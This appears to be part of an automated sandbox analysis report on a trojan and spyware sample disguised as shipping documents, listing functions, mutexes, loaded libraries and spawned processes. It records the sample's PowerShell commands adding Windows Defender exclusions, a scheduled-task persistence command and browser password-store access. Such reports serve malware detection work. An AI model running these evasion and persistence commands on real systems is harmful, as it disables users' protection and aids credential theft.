Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B016CC	8_2_01B016CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE5910	8_2_01AE5910
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A59950	8_2_01A59950
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6B950	8_2_01A6B950
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A538E0	8_2_01A538E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABD800	8_2_01ABD800
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6FB80	8_2_01A6FB80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A8DBF9	8_2_01A8DBF9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC5BF0	8_2_01AC5BF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FB76	8_2_01B0FB76
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEDAAC	8_2_01AEDAAC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A95AA0	8_2_01A95AA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF1AA3	8_2_01AF1AA3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFDAC6	8_2_01AFDAC6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC3A6C	8_2_01AC3A6C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07A46	8_2_01B07A46
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FA49	8_2_01B0FA49
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6FDC0	8_2_01A6FDC0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07D73	8_2_01B07D73
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A53D40	8_2_01A53D40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B01D5A	8_2_01B01D5A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FCF2	8_2_01B0FCF2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC9C32	8_2_01AC9C32
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FFB1	8_2_01B0FFB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A51F92	8_2_01A51F92
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FF09	8_2_01B0FF09
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A59EB0	8_2_01A59EB0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_01263E28	9_2_01263E28
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_0126F1A4	9_2_0126F1A4
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_01267018	9_2_01267018
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01130100	13_2_01130100
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01186000	13_2_01186000
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011C02C0	13_2_011C02C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140535	13_2_01140535
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01164750	13_2_01164750
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140770	13_2_01140770
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113C7C0	13_2_0113C7C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115C6E0	13_2_0115C6E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01156962	13_2_01156962
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011429A0	13_2_011429A0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114A840	13_2_0114A840
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01142840	13_2_01142840
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01178890	13_2_01178890
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011268B8	13_2_011268B8
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0116E8F0	13_2_0116E8F0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113EA80	13_2_0113EA80
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114AD00	13_2_0114AD00
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114ED7A	13_2_0114ED7A
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01158DBF	13_2_01158DBF
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01148DC0	13_2_01148DC0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113ADE0	13_2_0113ADE0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140C00	13_2_01140C00
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01130CF2	13_2_01130CF2
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01160F30	13_2_01160F30
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01182F28	13_2_01182F28
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B4F40	13_2_011B4F40
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011BEFA0	13_2_011BEFA0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01132FC8	13_2_01132FC8
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140E59	13_2_01140E59
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01152E90	13_2_01152E90
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0112F172	13_2_0112F172
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117516C	13_2_0117516C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114B1B0	13_2_0114B1B0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0112D34C	13_2_0112D34C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011433F3	13_2_011433F3
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011452A0	13_2_011452A0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115B2C0	13_2_0115B2C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115D2F0	13_2_0115D2F0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01131460	13_2_01131460
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01143497	13_2_01143497
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011874E0	13_2_011874E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114B730	13_2_0114B730
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01149950	13_2_01149950
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115B950	13_2_0115B950
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01145990	13_2_01145990
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011AD800	13_2_011AD800
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011438E0	13_2_011438E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115FB80	13_2_0115FB80
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B5BF0	13_2_011B5BF0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117DBF9	13_2_0117DBF9
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B3A6C	13_2_011B3A6C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01143D40	13_2_01143D40
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115FDC0	13_2_0115FDC0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B9C32	13_2_011B9C32
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01159C20	13_2_01159C20
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01141F92	13_2_01141F92
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01149EB0	13_2_01149EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: String function: 011AEA12 appears 37 times
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: String function: 01187E54 appears 97 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A97E54 appears 102 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01ACF290 appears 105 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01ABEA12 appears 86 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A3B970 appears 278 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A85130 appears 58 times

Sample file is different than original file name gathered from version info

Source: Original Shipping Documents.scr.exe, 00000000.00000002.1434724360.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000000.00000000.1379308557.0000000000CF1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedfxE.exe@ vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1477840807.0000000009960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001B3D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.000000000177F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe	Binary or memory string: OriginalFilenamedfxE.exe@ vs Original Shipping Documents.scr.exe

Uses 32bit PE files

Source: Original Shipping Documents.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Original Shipping Documents.scr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xHOAJKcJeCXuc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/16@15/9

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Mutant created: \Sessions\1\BaseNamedObjects\RmQvqpbPlHkbEvKha
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1E8.tmp

Jump to behavior

Source: Original Shipping Documents.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Original Shipping Documents.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecEdit.exe, 00000010.00000003.1928778852.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3849651901.0000000002A96000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Original Shipping Documents.scr.exe	Virustotal: Detection: 36%
Source: Original Shipping Documents.scr.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File read: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
